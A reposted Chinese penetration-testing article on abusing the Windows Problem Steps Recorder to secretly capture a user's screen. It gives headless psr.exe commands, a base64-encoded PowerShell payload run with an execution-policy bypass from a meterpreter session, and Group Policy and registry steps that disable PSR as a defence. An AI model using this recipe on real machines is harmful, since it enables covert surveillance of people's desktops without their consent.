如何巧妙利用PSR监控Windows桌面

最新推荐文章于 2024-09-20 13:55:12 发布
最新推荐文章于 2024-09-20 13:55:12 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: windows 三好大神

渗透技巧——如何巧妙利用PSR监控Windows桌面

三好学生 · 2016/03/29 10:21

0x00 前言

在渗透测试的过程中,如果需要获取主机的更多信息,相比于键盘记录,记录系统屏幕的操作往往更加直接有效。
也许每个人都有自己独特的实现方式,但是如果能够利用Windows系统自带的程序实现,个人认为绝对是最优先考虑的方案。
下面就介绍一下如何利用Windows系统自带的功能实现监控屏幕操作。

Alt text

0x01 简介

PSR(Problem Steps Recorder),直译为问题步骤记录器,在Windows 早期的系统中,采用WER(Windows Error Reporting)来收集系统的错误报告,但这些报告往往包含的信息太少以致于无法解决实际问题。

为此,微软从Windows 7系统开始,增加了PSR来解决这个问题,PSR能够记录用户在遇到崩溃时执行的所有操作,以便测试人员和开发人员能够重现环境对其分析和调试。

当PSR运行时,将会自动记录屏幕的操作,每次操作都会自动保存成一张图片,最终生成一份zip格式的报告。

注:
百度百科对psr的名称描述有误,准确的应为Problem Steps Recorder(该问题已提交)

如图 Alt text

链接为:
http://baike.baidu.com/link?url=BCQtF6gpxNGulRPj-vACw_NGwZvHPcrfvn4vmx6u_JFI_OcuPJIFzY3GYE-mu91DZcB-RLiQ6pGXTki1Fc0Y6K

0x02 使用方法

1、启动psr.exe,点击开始录制

可使用快捷键win+R直接输入psr来启动
下图为psr的操作面板,点击开始记录即可记录当前的屏幕操作

Alt text

点击后会提示权限的问题,如果需要记录管理员权限的程序,那么需要以管理员权限来运行psr,如图

Alt text

2、进行任意操作

当运行psr开始录制后,鼠标点击时会增加特效

如图 Alt text

3、停止记录,保存报告

如图 Alt text

4、查看报告

报告会对每次操作截图,并记录鼠标的操作

比如鼠标的单击操作,从截图注释可以看到当前的鼠标做了哪些操作 Alt text

而且,在报告后半部分会详细记录相关细节,里面的内容也很是有趣: Alt text

0x03 进阶方法

psr在记录屏幕的操作中会启动UI界面,并且对鼠标点击操作增加特效,这显然无法满足渗透测试的要求。

但好在psr提供了命令行参数用作后台记录

命令行参数如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
psr.exe [ /start | /stop ][ /output <fullfilepath>] [ /sc (0|1)] [ /maxsc <value>]
[ /sketch (0|1)] [ /slides (0|1)] [ /gui (0|1)]
[ /arcetl (0|1)] [ /arcxml (0|1)] [ /arcmht (0|1)]
[ /stopevent <eventname>] [ /maxlogsize <value>] [ /recordpid <pid>]
 
/start Start Recording. (Outputpath flag SHOULD be specified)
/stop Stop Recording.
/sc Capture screenshots for recorded steps.
/maxsc Maximum number of recent screen captures.
/maxlogsize Maximum log file size ( in MB) before wrapping occurs.
/gui Display control GUI.
/arcetl Include raw ETW file in archive output.
/arcxml Include MHT file in archive output.
/recordpid Record all actions associated with given PID.
/sketch Sketch UI if no screenshot was saved.
/slides Create slide show HTML pages.
/output Store output of record session in given path.
/stopevent Event to signal after output files are generated.

结合实际,可使用以下命令:

  1. psr.exe /start /gui 0 /output C:\test\capture.zip

    后台启动psr并开始录制,文件保存为C:\test\capture.zip

  2. psr.exe /stop

    结束录制并退出psr,自动保存报告文件

0x04 实际测试

测试环境:

Server:
OS:Kali linux
IP:192.168.174.133

Client:
OS:Win7 x86
IP:192.168.174.128

Kali已获得meterpreter权限

如图 Alt text

测试功能:

  1. 自动启动录制
  2. 录制指定时间后自动退出
  3. 自动保存报告文件

可使用Powershell对上述功能做简单实现:

1、启动自动录制,设置为无界面模式,并指定输出路径:

1
psr.exe /start /gui 0 /output C:\ test \capture.zip;

2、等待10s,即录制时间为10s:

1
Start-Sleep -s 10;

3、结束录制,自动退出:

1
psr.exe /stop ;

可将以上代码保存为C:\test\1.txt,然后对其作base64加密

在Powershell环境下执行如下代码来对功能代码进行base64加密:

1
2
3
4
$string = Get-Content "C:\test\1.txt"
$bytes = [System.Text.Encoding]::Unicode.GetBytes( $string )
$encoded = [System.Convert]::ToBase64String( $bytes )
$encoded

Alt text

如图,从输出得到加密的Powershell命令为:

1
cABzAHIALgBlAHgAZQAgAC8AcwB0AGEAcgB0ACAALwBnAHUAaQAgADAAIAAvAG8AdQB0AHAAdQB0ACAAQwA6AFwAdABlAHMAdABcAGMAYQBwAHQAdQByAGUALgB6AGkAcAA7ACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADsAIABwAHMAcgAuAGUAeABlACAALwBzAHQAbwBwADsA

然后就可以在meterpreter的shell下直接执行Powershell命令:

1
powershell -ep bypass -enc cABzAHIALgBlAHgAZQAgAC8AcwB0AGEAcgB0ACAALwBnAHUAaQAgADAAIAAvAG8AdQB0AHAAdQB0ACAAQwA6AFwAdABlAHMAdABcAGMAYQBwAHQAdQByAGUALgB6AGkAcAA7ACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADsAIABwAHMAcgAuAGUAeABlACAALwBzAHQAbwBwADsA

Alt text

代码执行后,等待10s产成报告文件capture.zip,测试成功

0x05 防御

可采用以下两种方法关闭psr:

1、使用组策略

中文系统:

gpedit.msc-管理模板-Windows组件-应用程序兼容性

启用关闭问题步骤记录器

如图 Alt text

英文系统:

gpedit.msc-Computer Configuration-Administrative Templates-Windows Components-Application Compatibility

启用Turn off Problem Steps Recorder

如图 Alt text

2、修改注册表

1
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat]

新建"DisableUAR"=dword:00000001

如图 Alt text

注:
dword=1对应组策略中的已启用
dword=0对应组策略中的已禁用
删除"DisableUAR"对应组策略中的未配置

0x06 小结

利用PSR监控Windows桌面,不仅仅能够捕获用户桌面的操作,而且在报告中会包含更多有用的细节信息,相信你在渗透测试的过程中,一定会用上它。

0x07 参考资料

本文由三好学生原创并首发于乌云drops,转载请注明

citelao
关注
专栏目录
局域网电脑桌面监控 桌面控制
10-31
多屏幕监控控制软件 由腾飞软件工作室开发,监控及控制内核,引用了国外优秀远程工具“VNC”内核,远程控制能力强大,高效实用,远程零延迟
PC桌面监控
lipeiran1987的专栏
06-18 1135
今天看qq群讨论:PC桌面监控桌面推流后通过浏览器实时播放,特此备注。 ffmpeg -r 20 -f gdigrab -i desktop -f dshow -i audio="麦克风 (High Definition Audio 设备)" -g 100 -qscale 10 -s 1366x768 -bf 5 -vcodec h264 -preset:v fast -pix_fmt ...
电脑桌面管理_远程电脑屏幕监控的方法有哪些?远程电脑桌面监控
weixin_39681058的博客
10-22 989
远程电脑屏幕监控的方法有哪些?在需要对电脑桌面进行监控及录像的场合,常规方案是用监控摄像头对着电脑屏幕拍摄,但是受室内不断变化的光线影响,这种方案的效果很差,安装也很复杂。超级眼屏幕监控软件的方案能够轻松的实现电脑桌面的远程监看和录像。远程电脑屏幕监控,许多企业都使用超级眼屏幕监控软件远程电脑实现桌面实时查看和操作。就像操作自己眼前的电脑一般轻松简单,还可以发起屏幕墙实现多台电脑桌面画面同时进行查...
设置Windows服务允许进行桌面交互,实现屏幕监控
weixin_33964094的博客
08-09 426
默认情况下,Windows服务基于安全考虑,是不允许任何服务程序和桌面进行交互的,也就是说,使用任何的Windows Form 的很多特性将会莫名奇妙的不起作用,如进行屏幕截图,或者使用System.Windows.Form.Timer对象也不行。由于Windows服务具有难以调试的特点,如果不注意这点,你反复检查自己的代码,都很难发现问题的所在的,我开始就是摸索了很久才发现,呵呵。Windows...
php-psr:提供可接受的PSR接口PHP扩展
01-30
PSR 参考 经过测试 , , 安装 Linux / macOS 必备软件包是: PHP开发标头和工具 gcc > = 4.4 | clang > = 3.x | vc > = 11 GNU make > = 3.81 automake autoconf 您将需要PHP开发标头。 如果手动安装了...
psr7:超轻量级PSR-7实施
04-28
PSR-7的实施 一种超轻量级的PSR-7实现。 非常严格而且非常快速。 描述 食尸鬼 薄片 苗条的 尼霍尔姆 代码行 3.300 3.100 1.900 1.000 PSR-7 * 66% 100% 75% 100% PSR-17 不 是的 是的 是的 HTTPlug ...
PSR.zip_PSR重构_psr_结构重构
09-14
**PSR重构与PSR结构重构** 在信息技术领域,PSR(Pseudo-State Reconstruction)重构是一种专门针对非线性时间序列分析的技术。它基于状态空间重构理论,旨在从原始时间序列数据中揭示出隐藏的动态结构,从而更好地...
在PB开发中利用PSR文件实现打印位置自由调整
02-28
### 在PB开发中利用PSR文件实现打印位置自由调整 #### 概述 在PowerBuilder(简称PB)的开发过程中,经常会遇到用户需要根据实际需求调整打印内容的位置、格式等情况。传统的做法是开发者通过修改源代码来调整打印...
psr-dummy-provider:虚拟PSR提供程序
04-06
PSR虚拟提供者 该程序包充当PSR虚拟程序包的虚拟提供程序。 在的帮助下测试软件包时,可以使用它。 安装 该软件包可以与composer一起安装: composer require yiisoft/psr-dummy-provider --prefer-dist 执照 Yii ...
Python-远程桌面监控服务端
08-10
远程桌面监控服务端
windows service服务监控工具
05-25
可以监控 tomcat,mysql之类的注册成service服务的应用服务中间件,或者其他的service也可以进行监控
有没有电脑桌面监控软件|十大电脑屏幕监控软件超全盘点!
2401_83058349的博客
05-07 974
特点与优势: ConnectWise Control提供了强大的远程访问和控制功能,特别适合IT管理服务提供商,支持批量部署、会话录制和详细的审计日志,确保安全合规。特点与优势: Zoho Assist是一款面向企业的远程支持和访问工具,除了基础的远程控制和屏幕监控,还整合了客户服务和会话管理功能,适合IT支持团队使用。特点与优势: 安企神是专业级的电脑监控软件,擅长实时监控员工的电脑操作,包括屏幕、聊天记录、文件传输等,且提供详细的数据分析,帮助企业优化管理策略。
十大监控电脑桌面的软件,电脑监控软件就它了
2401_83058349的博客
05-17 849
终端安全:硬件和软件变化时报警,违规外联时报警(切断网络、锁屏),禁止修改IP、计算机名、使用控制面板、任务管理器等功能,保护硬件信息。敏感词报警:设置敏感词报警,一旦发现员工在聊天和浏览器中输入相关敏感词,管理端会收到报警,企业及时做好应对预案,将损失降到最低。应用程序管控:为程序设置黑白名单,防止员工使用无关软件,如游戏、赌博类程序,禁止员工下载无关软件以及卸载软件,保护电脑安全。实时屏幕监控:允许管理员通过手机、平板电脑或其他远程设备,实时查看被监控电脑的屏幕画面,实时了解员工的工作动态。
使用windows自带的录像功能psr.exe
热门推荐
Lydia的博客
10-14 2万+
psr.exe (Problems Screen Recorde)问题步骤记录器 它可以录制屏幕信息 使用方法: 1.打开psr.exe win键+r, 打开“运行”对话框;输入psr.exe,按回车键 2.运行psr.exe后,点击开始记录 3.然后就可以进行正常操作了,当要结束记录时,点击停止记录 然后会弹出一个保存文件位置的对话框,选择一个位置保存,
一招教你不用任何软件就能知道谁动过你的电脑并做了哪些详细的操作,比查看Recent文件访问记录更厉害的方法开机自动运行PSR录制截取电脑操作
轶软工作室
03-26 1136
很多人都知道运行Recent可以查看最近文件访问记录,但仅仅是知道谁访问了哪些文件或程序,并不知道访问后做了哪些操作。我又尝试用开机自动循环定时截屏的方式保存操作记录,但是并不稳定,而且产生的数据非常,浏览也不方便,动手做个软件程序又太麻烦,想想有什么其他更便捷的方法吗?我忽想到Win10系统有个自带的程序叫步骤记录器的工具,打开运行,输入psr确定,试着记录了一下操作,效果还不错,记录的非常详细,阅读也很方便,但是如何让他开机就能自动在后台运行呢?还好我有点电脑编程基础,三五下就给做出来了。来看看代码:
windowsSDK实现 屏幕实时监控 热键截图 功能
Miibotree
07-11 5308
为了自己做出一个远控程序,自己花了点时间学习了有关绘图方面的知识点。 一.基本概念的了解 为了实现实时屏幕显示的功能,首先学习了下《windows程序设计》的第14章,位图和位块的传输。 理解了下位图和位块的区别,基本概念。 概念一:位图与图元的区别: 位图                  图元 点阵                  矢量      (位图与图元的主要区
实时监控局域网计算机桌面怎么设置?五个可实现方法分享|万万没想到!
最新发布
h2020530的博客
09-20 548
安企神是企业实时监控中的超级利器。你可以像看直播一样,随时随地查看员工的电脑屏幕,看看他们是在认真工作,还是偷偷摸鱼。多屏同步实时监控:实时查看员工电脑桌面操作内容,了解他们的工作情况,最多支持一键同时查看12台电脑屏幕。通过将每台员工电脑的显示内容直接输出到管理室的显示墙上,你可以同时监控几十台甚至上百台电脑的桌面情况。别担心,今天小编就来带你看看5个桌面监控方法,不仅操作简单,还能帮你轻松掌握员工的工作状态!远程操作:不仅能监控,还可以远程操作员工的电脑,帮他们解决技术问题或进行工作指导。
十大电脑屏幕监控软件超全盘点!
域智盾软件的博客
01-05 2172
它具备高效的网络传输性能和强大的屏幕共享功能,可以轻松实现远程桌面共享和控制。然而,随着人们对电脑使用的日益频繁,电脑屏幕监控软件也应运而生,成为了企业和个人用户进行电脑管理和监控的重要工具。这是一款提供清晰的功能列表的电脑屏幕监控软件,可以实时查看员工的电脑屏幕,支持屏幕墙,同时查看多个屏幕的画面。这是一款针对企业用户的电脑屏幕监控软件,可以实时监控员工的电脑操作,记录屏幕截图,限制应用程序使用等。这是一款专业的电脑屏幕监控软件,具有强大的监控功能,可以实时监控员工的电脑屏幕,并记录员工的操作行为。
Windows 7精华技巧:从选择版本到利用虚拟模式
"windows7必须知道的77条技巧,包括选择合适的Windows 7版本、考虑64位版、利用Windows XP虚拟模式、掌握Windows PowerShell v2的强大功能、使用AppLocker增强软件限制策略、在资源管理器和命令行之间快速切换、使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值